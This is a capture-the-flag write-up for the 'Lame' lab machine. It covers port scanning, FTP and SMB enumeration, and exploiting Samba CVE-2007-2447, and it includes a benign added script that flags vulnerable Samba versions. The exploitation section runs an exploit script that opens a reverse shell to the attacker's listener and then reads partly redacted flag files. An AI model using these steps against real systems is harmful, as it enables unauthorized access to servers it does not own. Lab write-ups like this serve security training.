Summary

Lame is an easy Linux box that can be exploited with CVE-2007-2447; no privilege escalation is required.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -Pn -oN fullnmap 10.129.24.78

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.33
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was anonymous login over FTP:

ftp 10.129.24.78
Connected to 10.129.24.78.
220 (vsFTPd 2.3.4)
Name (10.129.24.78:jeroen): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.

FTP Anonymous Login

Anonymous login was successful (username: anonymous, password: blank). Unfortunately, no useful information was found here.

SMB Enumeration

The next thing was to enumerate SMB with smbmap to check for shares and permissions:

	smbmap -H 10.129.24.78
	[+] IP: 10.129.24.78:445	Name: 10.129.24.78       

        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

The tmp share is both readable and writable. You can connect with: smbclient \\\\10.129.24.78\\tmp
The share contained the following files and directories:

smb: \> ls
  .                                   D        0  Mon Oct 19 14:08:46 2020
  ..                                 DR        0  Sun May 20 19:36:12 2012
  5303.jsvc_up                        R        0  Mon Oct 19 12:57:23 2020
  .ICE-unix                          DH        0  Mon Oct 19 12:56:14 2020
  vmware-root                        DR        0  Mon Oct 19 12:56:22 2020
  .X11-unix                          DH        0  Mon Oct 19 12:56:36 2020
  .X0-lock                           HR       11  Mon Oct 19 12:56:36 2020

No sensitive files or information were stored here.

Netbios

The next step was to search for the Samba version that Nmap discovered (netbios-ssn Samba smbd 3.0.20-Debian).
This led to CVE-2007-2447, which could potentially be used to exploit the target.
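As an added defender-side check (not part of the original writeup): the Python script below parses the open-port lines from the Nmap output shown above and flags any Samba build whose exact version falls in the CVE-2007-2447 affected range, 3.0.0 through 3.0.25rc3. The sample scan text is constructed from this page; it does not contact any host.

```python
import re

# Constructed sample: the open-port lines from the Nmap scan shown above.
SAMPLE_NMAP = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+(.*)$")
# Exact x.y.z version with optional rcN suffix; a banner like "3.X - 4.X" does not match.
SAMBA_VER = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")

def parse_nmap(text):
    """Return [(port, service, version_field)] for each open TCP port line."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3).strip()))
    return rows

def samba_version(version_field):
    """Return ((major, minor, patch), rc_or_None), or None if no exact version."""
    m = SAMBA_VER.search(version_field)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch)), (int(rc) if rc else None)

def affected_by_cve_2007_2447(version_field):
    """CVE-2007-2447 covers Samba 3.0.0 through 3.0.25rc3; 3.0.25 final is fixed."""
    parsed = samba_version(version_field)
    if parsed is None:
        return False  # no exact version: treat as unknown, not as vulnerable
    ver, rc = parsed
    if (3, 0, 0) <= ver < (3, 0, 25):
        return True
    return ver == (3, 0, 25) and rc is not None and rc <= 3

def find_vulnerable_samba(text):
    """Return [(port, version_label)] for Samba services in the affected range."""
    findings = []
    for port, _service, version in parse_nmap(text):
        if affected_by_cve_2007_2447(version):
            ver, rc = samba_version(version)
            findings.append((port, ".".join(map(str, ver)) + (f"rc{rc}" if rc else "")))
    return findings
```

Banners without an exact version (such as the "3.X - 4.X" guess on port 139) are reported as unknown rather than vulnerable, so the finding rests on the precise 3.0.20 string from port 445.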


Exploitation

A Python exploit script, usermap_script.py, was downloaded to exploit this manually.
A netcat listener was opened with nc -nvlp 4444, and the script was run as follows:
python3 usermap_script.py 10.129.24.78 139 10.10.14.33 4444

This returns a shell on the netcat listener; navigating to /home shows the following users:

cd /home

ls
ftp
makis
service
user

The home directory of makis contains user.txt.
Since no privilege escalation is required, root.txt can be read directly from /root:

cat /home/makis/user.txt && cat /root/root.txt

69454a937d9[...]
92caac3be14[...]